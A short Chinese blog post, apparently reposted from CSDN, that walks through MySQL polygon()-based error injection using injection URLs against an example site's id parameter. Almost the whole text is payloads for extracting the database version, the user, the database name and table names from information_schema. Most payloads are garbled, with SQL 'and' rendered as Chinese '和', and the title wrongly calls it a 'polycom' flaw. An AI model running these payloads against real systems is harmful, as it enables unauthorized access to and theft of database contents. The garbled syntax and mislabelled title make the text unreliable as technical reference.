【漏洞挖掘】——111、polygon报错注入深入刨析(polycom 漏洞)

【漏洞挖掘】——111、polygon报错注入深入刨析polygon报错注入流程
获取数据库版本信息 http://www.example.com/?id=1\’ and polygon((select * from (select * f

polygon报错注入流程

获取数据库版本信息

http://www.example.com/?id=1\’ 和Polygon((select * from (select * from(select version())a)b)) –+

获取用户名相关信息

http://www.example.com/?id=1\’ 和Polygon((select * from (select * from(select user())a)b)) –+

获取数据库名的信息

http://www.example.com/?id=1\’ 和Polygon((select * from (select * from(select database())a)b)) –+

获取数据库的表信息

查询第一个表名的信息。

http://www.example.com/?id=1\’ 和Polygon((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)) –+

查询第二个表名的信息。

http://www.example.com/?id=1\’ 和Polygon((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 1,1)a)b)) –+

剩下的就可以通过变量limits x和y中x的值来获取表名信息了~

#【漏洞挖掘】——111及以上多边形错误注入详细分析相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91365.html

(0)
CSDN的头像CSDN
上一篇 2024年6月21日
下一篇 2024年6月21日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注